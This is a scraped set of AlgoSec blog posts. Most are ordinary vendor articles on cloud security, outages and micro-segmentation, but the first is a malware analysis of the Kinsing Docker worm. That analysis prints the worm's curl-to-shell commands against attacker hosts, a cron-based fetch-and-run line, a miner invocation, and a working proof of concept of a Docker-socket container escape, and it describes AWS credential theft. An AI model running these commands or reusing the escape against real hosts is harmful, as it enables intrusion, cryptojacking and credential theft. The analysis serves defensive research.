

Search results
- AlgoSec | Kinsing Punk: An Epic Escape From Docker Containers
Cloud Security
Kinsing Punk: An Epic Escape From Docker Containers
Rony Moshkovich | 2 min read | Published 8/22/20

We all remember how, a decade ago, Windows password trojans harvested the credentials that some email and FTP clients kept on disk in unencrypted form. Network-aware worms brute-forced the credentials of weakly restricted shares to propagate across networks, and some piggybacked on the Windows Task Scheduler to activate remote payloads. Today, it's déjà vu all over again, only in the world of Linux.

As reported earlier this week by Cado Security, a new fork of the Kinsing malware propagates across misconfigured Docker platforms and compromises them with a coinminer. In this analysis, we break down some of its components and take a closer look at its modus operandi. As it turns out, some of its tricks, such as breaking out of a running Docker container, are quite fascinating. Let's start with its simplest trick: the credentials grabber.

AWS Credentials Grabber

If you use cloud services, chances are you have used Amazon Web Services (AWS). Once you log in to your AWS Console, create a new IAM user, and set its access type to Programmatic access, the console provides you with the Access key ID and Secret access key of the newly created IAM user. You then use those credentials to configure the AWS Command Line Interface (CLI) with the aws configure command. From that moment on, instead of using the web GUI of your AWS Console, you can achieve the same results programmatically with the AWS CLI. There is one little caveat, though.
The AWS CLI stores your credentials in a clear-text file called ~/.aws/credentials. The documentation explains this plainly: "The AWS CLI stores sensitive credential information that you specify with aws configure in a local file named credentials, in a folder named .aws in your home directory." That means your cloud infrastructure is now only as secure as your local computer. It was just a matter of time before the bad guys noticed such low-hanging fruit and used it for profit. Accordingly, the malware harvests these files for all users on the compromised host and uploads them to its C2 server.

Hosting

For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net runs an obsolete version of SugarCRM that is vulnerable to known exploits. The attackers compromised this server, installed the b374k webshell, and then uploaded several malicious files to it, starting from 11 July 2020. The server at 129[.]211[.]98[.]236, where the worm hosts its own body, is itself a vulnerable Docker host.
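Returning to the credentials grabber for a moment: its harvesting step boils down to enumerating one well-known path under every home directory. A minimal sketch of that logic (hypothetical code, not the malware's own, and pointed at a scratch directory rather than /):

```shell
# Sketch of the credentials-harvesting step: look for the clear-text
# AWS CLI credentials file under every user home below a given root.
find_aws_credentials() {
  root="$1"
  # check /root plus each directory under /home, relative to $root
  for home in "$root/root" "$root"/home/*; do
    [ -f "$home/.aws/credentials" ] && echo "$home/.aws/credentials"
  done
  return 0
}
```

The real malware then uploads each discovered file to its C2 server; the sketch stops at enumeration.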
According to Shodan, this server currently hosts a malicious Docker container image, system_docker, which is spun up with the following parameters:

./nigix --tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x --currency monero --httpd 8080

A history of executed container images suggests this host has run multiple malicious scripts under instances of the alpine container image:

chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh'
chroot /mnt /bin/sh -c 'iptables -F; chattr -ia /etc/resolv.conf; echo "nameserver 8.8.8.8" > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh'

Docker Lan Pwner

A special module called docker lan pwner is responsible for propagating the infection to other Docker hosts. To understand the mechanism behind it, remember that an unprotected Docker host effectively acts as a backdoor trojan. Configuring the Docker daemon to listen for remote connections is easy: all it requires is one extra entry, -H tcp://127.0.0.1:2375, in the systemd unit file or in daemon.json. Once configured and restarted, the daemon exposes port 2375 to remote clients:

$ sudo netstat -tulpn | grep dockerd
tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd

To attack other hosts, the malware collects the network segments of all network interfaces with the help of the ip route show command. For example, for an interface with the assigned IP 192.168.20.25, the range of all available hosts on that network can be expressed in CIDR notation as 192.168.20.0/24.
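The segment-collection step can be reproduced harmlessly by parsing a captured sample of ip route show output instead of running the command live (the addresses below are illustrative):

```shell
# Sketch of the segment-collection step: keep every CIDR block that
# appears as the first field of an `ip route show` line.
collect_segments() {
  awk '$1 ~ /\// {print $1}'
}

# captured sample of `ip route show` output (illustrative addresses)
sample='default via 192.168.20.1 dev eth0
192.168.20.0/24 dev eth0 proto kernel scope link src 192.168.20.25'

printf '%s\n' "$sample" | collect_segments
```

On the sample above this prints the single segment 192.168.20.0/24, which is exactly the range the worm then hands to its scanner.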
For each collected network segment, it launches the masscan tool to probe every IP address in the segment on the following ports:

Port  Service            Description
2375  docker             Docker REST API (plain text)
2376  docker-s           Docker REST API (SSL)
2377  swarm              RPC interface for Docker Swarm
4243  docker             Old Docker REST API (plain text)
4244  docker-basic-auth  Authentication for the old Docker REST API

The scan rate is set to 50,000 packets per second. For example, running masscan over the CIDR block 192.168.20.0/24 on port 2375 may produce output similar to:

$ masscan 192.168.20.0/24 -p2375 --rate=50000
Discovered open port 2375/tcp on 192.168.20.25

From this output, the malware selects the word in the 6th position, which is the detected IP address. Next, the worm runs zgrab, a banner-grabber utility, to send an HTTP request for "/v1.16/version" to the selected endpoint; sending such a request to an instance of the Docker daemon returns the daemon's version banner as JSON. It then applies the grep utility to the contents returned by zgrab, making sure the returned JSON contains either the "ApiVersion" or the "client version 1.16" string; the latest version of the Docker daemon has "ApiVersion" in its banner. Finally, it applies jq, a command-line JSON processor, to parse the JSON, extract the "ip" field, and return it as a string. With all the steps above combined, the worm ends up with a list of IP addresses of hosts running the Docker daemon in the same network segments as the victim.
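Two of the parsing steps described above can be re-created against captured sample output rather than live scans (the banner JSON below is a made-up stand-in for a real /version response):

```shell
# Step 1 (masscan output): the detected IP is the 6th whitespace-
# separated word of a "Discovered open port ..." line.
extract_ip() {
  awk '/Discovered open port/ {print $6}'
}

# Step 2 (zgrab output): keep only banners that look like a Docker
# daemon -- the same two strings the worm greps for.
looks_like_docker() {
  grep -q -e '"ApiVersion"' -e 'client version 1.16'
}

scan_line='Discovered open port 2375/tcp on 192.168.20.25'
banner='{"ApiVersion":"1.40","MinAPIVersion":"1.12"}'   # made-up sample

printf '%s\n' "$scan_line" | extract_ip
printf '%s\n' "$banner" | looks_like_docker && echo "looks like a Docker daemon"
```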
For each returned IP address, it attempts to connect to the Docker daemon listening on one of the enumerated ports and instructs it to download and run the malicious script:

docker -H tcp://[IP_ADDRESS]:[PORT] run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "curl [MALICIOUS_SCRIPT] | bash; ..."

The malicious script employed by the worm lets it execute code directly on the host, effectively escaping the boundaries imposed by the Docker container. We'll get to this trick in a moment. For now, let's break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to run the legitimate alpine image with the following parameters:

- the --rm switch causes Docker to automatically remove the container when it exits
- -v /:/mnt is a bind-mount parameter that instructs the Docker runtime to mount the host's root directory / inside the container as /mnt
- chroot /mnt changes the root directory of the current process to /mnt, which corresponds to the host's root directory /
- a malicious script is downloaded and executed

Escaping From the Docker Container

The malicious script downloaded and executed inside the alpine container first checks whether the user's crontab, a configuration file that specifies shell commands to run periodically on a given schedule, contains the string "129[.]211[.]98[.]236":

crontab -l | grep -e "129[.]211[.]98[.]236" | grep -v grep

If it does not, the script sets up a new cron job:

echo "setup cron"
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1"
) | crontab -

The snippet above suppresses the "no crontab for username" message and creates a new scheduled task to be executed every minute. The scheduled task consists of two parts: download and execute the malicious script, then delete all scheduled tasks from the crontab.
This effectively executes the scheduled task only once, with a one-minute delay. After that, the container quits. There are two important points about this trick:

- because the container's root directory was mapped to the host's root directory /, any task scheduled inside the container is actually scheduled in the host's root crontab
- because the Docker daemon runs as root, a remote non-root user following these steps creates a task in root's crontab, to be executed as root

Building a PoC

To test this trick in action, let's create a shell script that prints "123" into a file _123.txt located in the root directory /:

echo "setup cron"
(
crontab -l 2>/dev/null
echo "* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1"
) | crontab -

Next, let's pass this script, encoded in base64, to the Docker daemon running on the local host:

docker -H tcp://127.0.0.1:2375 run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "echo '[OUR_BASE_64_ENCODED_SCRIPT]' | base64 -d | bash"

Upon execution of this command, the alpine image starts and quits. This can be confirmed by the empty list of running containers:

$ docker -H tcp://127.0.0.1:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES

The important question now is whether the crontab job was created inside the (now destroyed) Docker container or on the host. Checking root's crontab on the host shows that the task was scheduled for the host's root, to be run on the host:

$ sudo crontab -l
* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1

A minute later, the file _123.txt shows up in the host's root directory, and the scheduled entry disappears from root's crontab on the host:

$ sudo crontab -l
no crontab for root

This simple exercise proves that while the malware executes the malicious script inside a spawned container, insulated from the host, the task it schedules is created and then executed on the host.
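The base64 wrapping used in that docker command can be reproduced on its own, with no Docker daemon involved, to see why it survives shell quoting (harmless payload; assumes a base64 that accepts -d, as GNU coreutils and busybox do):

```shell
# Re-creation of the payload delivery: encode a harmless script, then
# decode and execute it the way the PoC's
#   sh -c "echo '<b64>' | base64 -d | bash"
# command does on the receiving side.
payload='echo 123'
encoded=$(printf '%s' "$payload" | base64)

# receiving side: decode and pipe into a shell
result=$(printf '%s' "$encoded" | base64 -d | sh)
echo "$result"
```

Because the script travels as a single base64 token, it passes through the nested quoting of docker, sh -c, and echo without any character needing to be escaped.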
By using the cron job trick, the malware manipulates the Docker daemon into executing malware directly on the host!

Malicious Script

Upon escaping the container to be executed directly on a remote compromised host, the malicious script performs the following actions:
- AlgoSec | Navigating the Cybersecurity Horizon in 2024
Network Segmentation
Navigating the Cybersecurity Horizon in 2024
Prof. Avishai Wool | 2 min read | Published 12/17/23

The persistence of sophisticated ransomware

In 2023, organizations faced a surge in ransomware attacks, prompting a reevaluation of cybersecurity readiness. The focus on high-value assets and critical infrastructure indicated an escalating threat landscape, demanding stronger preemptive measures. This trend is expected to continue in 2024 as cybercriminals exploit new vulnerabilities. Beyond relying on technology alone, organizations must adopt strategies like Zero Trust and micro-segmentation for comprehensive preparedness, fortifying data security. A resolute and practical response is crucial to safeguarding critical assets in the evolving cybersecurity landscape.

DevSecOps integration

DevSecOps is set to become a cornerstone of software development, integrating security practices proactively. As Infrastructure as a Service (IaaS) grows in popularity, customizing security settings becomes challenging, necessitating a shift away from reliance on the network perimeter. Anticipating an "always-on security" approach similar to Infrastructure as Code (IaC), companies can implement policy-based guardrails in the CI/CD pipeline. If changes that violate the guardrails are identified, automation should halt for human review.

Cloud-Native Application Protection Platforms (CNAPP)

The CNAPP market has advanced from basic Cloud Security Posture Management (CSPM) to include varied vulnerability and malware scans, along with crucial behavioral analytics for cloud assets such as containers.
However, few vendors emphasize deep analysis of IaaS networking controls in risk and compliance reporting. A more complete CNAPP platform should also provide comprehensive analytics of cloud applications' connectivity exposure.

An application-centric approach to network security will supersede basic NSPM

Prepare for the shift from network security policy management (NSPM) to an application-centric security approach, driven by advanced technologies, to accelerate in 2024. Organizations grappling with downsizing and staff shortages will strategically adopt this holistic approach to improve the efficiency of their security operations teams. Emphasizing knowledge retention and automated change processes will become crucial to maintaining security with agility.

AI-based enhancements to security processes

Generative AI, as heralded by ChatGPT and its ilk, made great strides in 2023 and demonstrated that the technology has a lot of potential. I think that in 2024 we will see many more use cases in which this potential goes from simply being "cool" to a mature technology brought to market to deliver real value to the owners of security processes. Any use case that involves analyzing, summarizing, or generalizing text can potentially benefit from a generative AI assist. The trick will be to do so in ways that save human time without introducing factual hallucinations.
- AlgoSec | Resolving human error in application outages: strategies for success
Cyber Attacks & Incident Response
Resolving human error in application outages: strategies for success
Malynnda Littky-Porath | 2 min read | Published 3/18/24

Application outages caused by human error can be a nightmare for businesses, leading to financial losses, customer dissatisfaction, and reputational damage. While human error is inevitable, organizations can implement effective strategies to minimize its impact and resolve outages promptly. In this blog post, we will explore proven solutions for addressing human error in application outages, empowering businesses to enhance their operational resilience and deliver uninterrupted services to their customers.

Organizations must emphasize training and education

One of the most crucial steps in resolving human error in application outages is investing in comprehensive training and education for IT staff. By ensuring that employees have the necessary skills, knowledge, and understanding of the application environment, organizations can reduce the likelihood of errors. Training should cover proper configuration management, system monitoring, troubleshooting techniques, and incident response protocols.

Additionally, fostering a culture of continuous learning and improvement is essential. Encourage employees to stay up to date with the latest technologies, best practices, and industry trends through workshops, conferences, and online courses. Regular knowledge-sharing sessions and cross-team collaboration can also help mitigate human error by fostering a culture of accountability and knowledge transfer.
It's time to implement robust change management processes

Implementing rigorous change management processes is vital for preventing the human errors that lead to application outages. A standardized change management framework ensures that all modifications to the application environment go through a well-defined process, reducing the risk of inadvertent errors. The process should include proper documentation of proposed changes, a thorough impact analysis, and rigorous testing in non-production environments before changes are deployed to production. Additionally, maintaining a change log and conducting post-implementation reviews can provide valuable insights for identifying and rectifying potential errors.

Why automate and orchestrate operational tasks

Human errors often occur in repetitive, mundane tasks that are prone to oversight or mistakes. Automating and orchestrating operational tasks can significantly reduce human error in application outages. Organizations should leverage automation tools to streamline routine tasks such as provisioning, configuration management, and deployment. By removing the manual element, the risk of human error decreases, and the consistency and accuracy of these tasks improve. Furthermore, orchestration tools allow the coordination and synchronization of complex workflows involving multiple teams and systems, reducing the likelihood of miscommunication and minimizing errors caused by lack of coordination.

Establish effective monitoring and alerting mechanisms

Proactive monitoring and timely alerts are crucial for identifying potential issues and resolving them before they escalate into outages. Robust monitoring systems that capture key performance indicators, system metrics, and application logs enable IT teams to quickly identify anomalies and take corrective action.
Additionally, setting up alerts and notifications for critical events ensures that the appropriate personnel are notified promptly, allowing rapid response and resolution. Leveraging artificial intelligence and machine learning can enhance monitoring by detecting patterns and anomalies that human operators might miss.

Human error will always be a factor in application outages, but by implementing effective strategies, organizations can minimize its impact and resolve incidents promptly. Investing in comprehensive training, robust change management processes, automation and orchestration, and proactive monitoring can significantly reduce the likelihood of human-error-related outages. By prioritizing these solutions and fostering a culture of continuous improvement, businesses can enhance their operational resilience, protect their reputation, and deliver uninterrupted services to their customers.
- AlgoSec | Your Complete Guide to Cloud Security Architecture
Cloud Security
Your Complete Guide to Cloud Security Architecture
Rony Moshkovich | 2 min read | Published 7/4/23

In today's digital world, is your data 100% secure? As more people and businesses use cloud services to handle their data, vulnerabilities multiply. Around six out of ten companies have moved to the cloud, according to Statista, so keeping data safe is now a crucial concern for most large companies: in 2022, the average data leak cost companies $4.35 million. This is where cloud security architecture comes in. Done well, it protects cloud-based data from hackers, leaks, and other online threats.

To give you a thorough understanding of cloud security architecture, we'll look at:
- What cloud security architecture is
- The top risks for your cloud
- How to build your cloud security
- How to choose a CSPM (Cloud Security Posture Management) tool

Let's jump in.

What is cloud security architecture?

Let's start with a definition: "Cloud security architecture is the umbrella term used to describe all hardware, software and infrastructure that protects the cloud environment and its components, such as data, workloads, containers, virtual machines and APIs." (source)

In other words, cloud security architecture is a framework to protect data stored or used in the cloud. It includes ways to keep data safe, such as controlling access, encrypting sensitive information, and ensuring the network is secure. The framework has to be comprehensive because the cloud can be vulnerable to many different types of attack.

Three key principles behind cloud security

Although cloud security sounds complex, it can be broken down into three key ideas.
These are known as the CIA triad:
- Confidentiality
- Integrity
- Availability

Confidentiality

Confidentiality is concerned with data protection: if only the right people can access important information, breaches are reduced. There are many ways to achieve this, such as encryption, access control, and user authentication.

Integrity

Integrity means making sure data stays accurate throughout its lifecycle. Organizations can use checksums and digital signatures to ensure that data doesn't get changed or deleted, protecting against data corruption and keeping information reliable.

Availability

Availability is about ensuring data and resources are available when people need them. This requires a robust infrastructure and the ability to switch to backup systems when needed. It also means designing systems that can withstand denial-of-service attacks that would otherwise interrupt service.

However, these three principles are just the start of a strong cloud infrastructure. The next step is for the cloud provider and the customer to understand their security responsibilities. A model developed to do this is called the Shared Responsibility Model.

Understanding the Shared Responsibility Model

Big companies like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform offer public cloud services. These companies have a culture of being security-minded, but security isn't their responsibility alone: companies that use these services share responsibility for handling data. The division of responsibility depends on the service model a customer chooses, which led AWS to create a "shared responsibility model" that outlines it.

There are three main kinds of cloud service models, each giving different duties, levels of control, and flexibility:
- Infrastructure as a Service (IaaS)
- Platform as a Service (PaaS)
- Software as a Service (SaaS)
Infrastructure as a Service (IaaS)

With IaaS, the provider gives users virtual servers, storage, and networking resources. Users control the operating systems, while the provider manages the underlying infrastructure. Customers must maintain good security measures, such as access controls and data encryption, and they need to handle software updates and security patches.

Platform as a Service (PaaS)

PaaS lets users create and run apps without worrying about on-premises hardware. The provider handles infrastructure such as servers, storage, and networking. Customers still need to control access and keep their data safe.

Software as a Service (SaaS)

SaaS lets users access apps without having to manage any software themselves. The provider handles everything: updates, security, and the underlying infrastructure. Users can access the software through their browser and start using it immediately, but customers still need to manage their data and ensure secure access.

Top six cybersecurity risks

As more companies move their data and apps to the cloud, there are more opportunities for security incidents to occur. Although cybersecurity risks change over time, some common cloud security risks are:

1. Human error

99% of all cloud security incidents from now until 2025 are expected to result from human error. Errors can be minor, like using weak passwords or accidentally sharing sensitive information, or bigger, like setting up security incorrectly. To lower the risk of human error, organizations can take several actions, for example educating employees, using automation, and having good change management procedures.

2. Denial-of-service attacks

DoS attacks stop a service from working by sending too many requests, which can make essential apps, data, and resources unavailable in the cloud. DDoS attacks are more advanced than DoS attacks and can be very destructive. To protect against these attacks, organizations should use cloud-based DDoS protection.
They can also install firewalls and intrusion prevention systems to secure cloud resources.

3. Hardware strength

The strength of the physical hardware used for cloud services is critical. Companies should look carefully at their cloud service providers' (CSPs') hardware offerings. Users can also employ special devices called hardware security modules (HSMs), which protect encryption keys and help ensure data security.

4. Insider attacks

Insider attacks can be led by current or former employees, or by key service providers. They are incredibly expensive, costing companies $15.38 million on average in 2021. To stop these attacks, organizations should have strict access control policies, such as reviewing access regularly and watching for unusual user behavior. They should also only give users access to what they need for their job.

5. Shadow IT

Shadow IT is when people use unauthorized apps, devices, or services; easy-to-use cloud services are an obvious cause. It can lead to data breaches, compliance issues, and security problems. Organizations should have clear rules about using cloud services, and all policies should be run through centralized IT control.

6. Cloud edge

When data is processed close to where it is produced rather than in a data center, we refer to it as being at the cloud edge. The issue? The cloud edge is easier to attack: there are simply more places to attack, and sensitive data might be stored in less secure spots. Companies should ensure security policies cover edge devices and networks, encrypt all data, and use the latest application security patches.

Six steps to secure your cloud

Now that we know the biggest security risks, we can look at how to secure our cloud architecture against them. An important aspect of cloud security practice is managing access to your cloud resources: deciding who can access what, and what they can do, makes a crucial difference to security.
Identity and Access Management (IAM) security models can help with this by controlling user access based on roles and responsibilities. The security requirements of IAM include:

1. Authentication

Authentication is simply checking a user's identity when they access your data. At the most basic level, this means asking for a username and password. More advanced methods include multi-factor authentication, which requires users to provide two or more types of proof of identity.

2. Authorization

Authorization means allowing access to resources based on user roles and permissions. This ensures that users can only use the data and services they need for their job; limiting access reduces the risk from unauthorized users. Role-based access control (RBAC), where users are granted access based on their job roles, is one way to do this in a cloud environment.

3. Auditing

Auditing involves monitoring and recording user activities in a cloud environment. This helps find possible security problems and keeps an access log. By regularly reviewing access logs, organizations can identify unusual patterns or suspicious behavior.

4. Encryption at rest and in transit

Data at rest is data that is not currently being used; data in transit is data being sent between devices or users. Encryption protects data from unauthorized access by converting it into a code that can only be read by someone with the right key. When data is stored in the cloud, it is important to encrypt it to protect it from prying eyes, and many cloud service providers have built-in encryption features for data at rest. For data in transit, protocols like SSL/TLS help prevent interception, ensuring that sensitive information remains secure as it moves across networks.

5. Network security and firewalls

Good network security controls are essential for keeping a cloud environment safe.
One of the key network security measures is using firewalls to control traffic: firewalls act as gatekeepers, blocking certain types of connections based on rules. Intrusion detection and prevention systems (IDPS) are another important network security tool. IDPS tools watch network traffic for signs of malicious activity, like hacking or malware, and can automatically block threats or alert administrators about them. This helps organizations respond quickly to security incidents and minimize damage.

6. Versioning and logging

Versioning is tracking different versions of cloud resources, like apps and data. It allows companies to roll back to a previous version in case of a security incident or data breach, and by maintaining a version history, organizations can identify and address security vulnerabilities.

How a CSPM can help protect your cloud security

A Cloud Security Posture Management (CSPM) tool is helpful for safeguarding cloud security. These security tools monitor your cloud environment to find and fix potential problems, so selecting the right one is essential for maintaining the security of your cloud.

A CSPM tool like the Prevasio management service can help you and your cloud environment by providing alerts that notify you of any concerns with security policies, allowing you to address problems quickly and efficiently. Here are some of the features that Prevasio offers:
- Agentless CSPM solution
- Secure multi-cloud environments within 3 minutes
- Coverage across multi-cloud, multi-account, cloud-native services, and cloud applications
- Prioritized risk list based on CIS benchmarks
- Uncover hidden backdoors in container environments
- Identify misconfigurations and security threats
- Dynamic behavior analysis for container security issues
- Static analysis for container vulnerabilities and malware

All of these allow you to fix information security issues quickly and avoid data loss.
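The role-based access control mentioned in the authorization step can be illustrated with a tiny sketch (hypothetical roles and permissions, not any particular cloud provider's API):

```shell
# Hypothetical RBAC sketch: map a role to its permitted actions and
# check a requested action against that list.
permissions_for() {
  case "$1" in
    admin)   echo "read write delete" ;;
    analyst) echo "read" ;;
    *)       echo "" ;;
  esac
}

is_authorized() {  # usage: is_authorized <role> <action>
  perms=$(permissions_for "$1")
  case " $perms " in
    *" $2 "*) return 0 ;;
    *)        return 1 ;;
  esac
}
```

With these rules, is_authorized admin delete succeeds while is_authorized analyst delete fails, which is the least-privilege behavior the section describes.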
Investing in a reliable CSPM tool is a wise decision for any company that relies on cloud technology.

Final Words
As the cloud computing security landscape evolves, so must cloud security architects. All companies need to be proactive in addressing their data vulnerabilities. Advanced security tools such as Prevasio make protecting cloud environments easier, and firm security policies avoid unnecessary financial and reputational risk. This combination of strict rules and effective tools is the best way to stay secure.

Related Articles: 2025 in review: What innovations and milestones defined AlgoSec's transformative year in 2025? (AlgoSec Reviews, Mar 19, 2023 · 2 min read) | Navigating Compliance in the Cloud (AlgoSec Cloud, Mar 19, 2023 · 2 min read) | 5 Multi-Cloud Environments (Cloud Security, Mar 19, 2023 · 2 min read)
- Global financial institution automates hybrid cloud security with AlgoSec - AlgoSec
Global financial institution automates hybrid cloud security with AlgoSec Case Study Download PDF
- AlgoSec | The great Fastly outage
The great Fastly outage
Application Connectivity Management | Tsippi Dach | 2 min read | Published 9/29/21

Tsippi Dach, Director of Communications at AlgoSec, explores what happened during this past summer's Fastly outage and how your business can protect itself in the future. The odds are that before June 8th you probably hadn't heard of Fastly unless you were a customer. It was only when swathes of the internet went down with the 503: Service Unavailable error message that the edge cloud provider started to make headlines. For almost an hour, sites like Amazon and eBay were inaccessible, costing millions of dollars' worth of revenue. PayPal, which processed roughly $106 million worth of transactions per hour throughout 2020, was also impacted, and disruption at Shopify left thousands of online retail businesses unable to serve customers. While the true cost of losing a significant portion of the internet for almost an hour is yet to be tallied, we do know what caused it.

What is Fastly and why did it break the internet?
Fastly is a US-based content distribution network (CDN), sometimes referred to as an 'edge cloud provider.' CDNs relieve the load on a website's servers and ostensibly improve performance for end-users by caching copies of web pages on a distributed network of servers that are geographically closer to them. The downside is that when a CDN goes down – due to a configuration error in Fastly's case – it reveals just how vulnerable businesses are to forces outside of their control. Many websites, perhaps even yours, are heavily dependent on a handful of cloud-based providers.
When these providers experience difficulties, the consequences for your business are amplified ten-fold. Not only do you run the risk of long-term and costly disruption, but these weak links can also provide a golden opportunity for bad actors to target your business with malicious software that can move laterally across your network and cause untold damage.

How micro-segmentation can help
The security and operational risks caused by these outages can be mitigated by implementing plans that should already be part of an organization's cyber resilience strategy. One aspect of this is micro-segmentation, which is regarded as one of the most effective methods to limit the damage of an intrusion or attack, and therefore to limit large-scale downtime from configuration misfires and cyberattacks. Micro-segmentation is the act of creating secure "zones" in data centers and cloud deployments that allow your company to isolate workloads from one another. In effect, this makes your network security more compartmentalized, so that if a bad actor takes advantage of an outage to breach your organization's network, or user error causes a system malfunction, you can isolate the incident and prevent lateral impact.

Simplifying micro-segmentation with AlgoSec Security Management Suite
The AlgoSec Security Management Suite employs the power of automation to make it easy for businesses to define and enforce their micro-segmentation strategy, ensuring that it does not block critical business services and also meets compliance requirements.
AlgoSec supports micro-segmentation by:

- Mapping the applications and traffic flows across your hybrid network
- Identifying unprotected network flows that do not cross any firewall and are not filtered for an application
- Automatically identifying changes that will violate the micro-segmentation strategy
- Ensuring easy management of network security policies across your hybrid network
- Automatically implementing network security policy changes
- Automatically validating changes
- Generating a custom report on compliance with the micro-segmentation policy

Find out more about how micro-segmentation can help you boost your security posture, or request your personal demo.
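The zoning idea behind micro-segmentation can be sketched as a default-deny allow-list of zone-to-zone flows. This is a toy illustration of the concept, not AlgoSec's implementation; the zone names are hypothetical:

```python
# Micro-segmentation sketch: traffic between zones is denied unless the
# zone-to-zone flow is explicitly allow-listed. Zone names are hypothetical.
ALLOWED_FLOWS = {
    ("web", "app"),  # web tier may reach the application tier
    ("app", "db"),   # application tier may reach the database tier
}

def is_flow_allowed(src_zone: str, dst_zone: str) -> bool:
    """Default-deny: a flow passes only if it is on the allow-list."""
    return (src_zone, dst_zone) in ALLOWED_FLOWS

print(is_flow_allowed("web", "app"))  # permitted flow
print(is_flow_allowed("web", "db"))   # blocked: web must not reach the database directly
```

Because every flow not explicitly listed is dropped, a compromise of one zone cannot move laterally to zones that were never authorized to talk to it, which is the compartmentalization effect described above.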
- AlgoSec AppViz Application visibility for AlgoSec Firewall Analyzer - AlgoSec
AlgoSec AppViz Application visibility for AlgoSec Firewall Analyzer Download PDF
- The power of double-layered protection across your cloud estate - AlgoSec
The power of double-layered protection across your cloud estate Download PDF
- AlgoSec | Why organizations need to embrace new thinking in how they tackle hybrid cloud security challenges
Why organizations need to embrace new thinking in how they tackle hybrid cloud security challenges
DevSecOps | Prof. Avishai Wool | 2 min read | Published 10/9/22

Hybrid cloud computing enables organizations to deploy sensitive workloads on-premises or in a private cloud, while hosting less business-critical resources on public clouds. But despite its many benefits, the hybrid environment also creates security concerns. AlgoSec's co-founder and CTO, Prof. Avishai Wool, shares his expert insights on these concerns and offers best practices to boost hybrid cloud security. Hybrid cloud computing combines on-premises infrastructure, private cloud services, and one or more public clouds. Going hybrid provides businesses with enhanced flexibility, agility, cost savings, and scalability to innovate, grow, and gain a competitive advantage. So, how can you simplify and strengthen security operations in the hybrid cloud?

It all starts with visibility – you still can't protect what you can't see
To protect their entire hybrid infrastructure, applications, workloads, and data, security teams need to know what these assets are and where they reside. They also need to see the entire hybrid estate, not just its individual elements. However, complete visibility is a serious hybrid cloud security challenge. Hybrid environments are highly complex, which can create security blind spots that prevent teams from identifying, evaluating, and, most importantly, mitigating risk. Another hybrid cloud security concern is that a fragmented security approach cannot control the entire network.
With thousands of integrated and inter-dependent resources and data flowing between them, vulnerabilities crop up, increasing the risk of cyberattacks or breaches. For complete hybrid cloud security, you need a holistic approach that can help you control the entire network.

Is DevSecOps the panacea? Not quite
In many organizations, DevSecOps teams manage cloud security because they have visibility into what's happening inside the cloud. However, in the hybrid cloud, many applications have servers or clients existing outside the cloud, which DevSecOps may not have visibility into. Also, the protection of data flowing into and out of the cloud is not always under their remit. To make up for these gaps, other teams are required to manage security operations and minimize hybrid cloud risks. These additional processes and team members must be coordinated to ensure continuous security across the entire hybrid network environment. But this is easier said than done.

Using IaC to balance automation with oversight is key, but here's why you shouldn't solely rely on it
Infrastructure as code (IaC) helps you automatically deploy security controls in the hybrid cloud to prevent misconfiguration errors, non-compliance, and violations, both in the production stage and in pre-production application testing. With IaC-based security, you can define security best practices in template files, which minimizes risk and enhances your security posture. But there is an inherent risk in putting all your eggs in the automation and IaC basket. Because all the controls are on the operational side, serious hybrid cloud security issues can arise, and without human attention and action, vulnerabilities may remain unaddressed and open the door to cyberattacks. Since security professionals who are not on the operational side must oversee the cloud environment, miscommunication and human error can easily creep in – a very costly proposition for organizations.
For this very reason, you should also implement a process to regularly deploy automatic updates without requiring time-consuming approvals that slow down workflows and weaken security. Strive for 95% automated changes, and involve a person only for the remaining 5% that requires human input.

Hybrid cloud security best practices – start early, start strong
When migrating from on-prem to the cloud, you can choose a greenfield migration or a lift-and-shift migration. Greenfield means rolling out a brand-new application. In this case, ensure that security considerations are "baked in" from the beginning and across all processes. This "shift left" approach helps build an environment that is secure from the get-go and ensures that all team members adhere to a unified set of security policy rules, minimizing vulnerabilities and reducing security risks within the hybrid cloud environment. If you lift-and-shift on-prem applications to the cloud, note any security assumptions made when they were designed. This is important because they were not built for the cloud and may incorporate protocols that increase security risks. Next, implement appropriate measures during migration planning. For example, implement an Application Load Balancer if applications leverage plaintext protocols, and use sidecars to add encryption without having to modify the original codebase. You can also leverage hybrid cloud security solutions to detect and mitigate security problems in real time.

Matching your cloud security with application structure is no longer optional
Before moving to a hybrid cloud, map the business logic, application structure, and application ownership onto the hybrid cloud estate's networking structure. To simplify this process, here are some tried and proven approaches to consider. Break up your environment into a virtual private cloud (VPC) or virtual network.
With a VPC, you can monitor connections, screen traffic, create multiple subnets, and restrict instance access to improve your security posture. Use networking constructs to segregate applications into different functional and networking areas in the cloud. This way, you can deploy network controls to segment your cloud estate and ensure that only authorized users can access sensitive data and resources. Tag all resources based on their operating system, business unit, and geographical area. Tags with descriptive metadata help identify resources, establish ownership and accountability, provide visibility into cloud consumption, and support the deployment of security policies.

Conclusion
